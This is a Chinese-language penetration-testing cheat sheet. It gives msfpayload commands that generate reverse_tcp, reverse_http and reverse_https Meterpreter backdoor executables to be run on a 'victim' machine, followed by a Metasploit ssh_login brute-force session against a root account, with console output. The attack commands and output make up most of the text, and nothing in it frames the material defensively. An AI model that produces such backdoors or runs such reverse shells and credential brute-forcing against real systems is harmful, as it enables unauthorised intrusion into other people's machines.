x01 reverse the shell
File
通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。
reverse_tcp/http/https => exe => victim => shell
reverse_tcp
windows:
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
Linux(x86)
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell
reverse_http
msfpayload windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
reverse_https
msfpayload windows/meterpreter/reverse_https LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
Login privilege
在获得一些登陆权限之后获得meterpreter shell的方法。
SSH
ssh_login
模块路径:auxiliary/scanner/ssh/ssh_login
msf exploit(sshexec) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS
set PASSWORD set PASS_FILE
msf auxiliary(ssh_login) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(ssh_login) > exploit
[*] 192.168.1.104:22 SSH - Starting bruteforce
[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: ''
[-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root':''
[*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root'
[-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root':'root'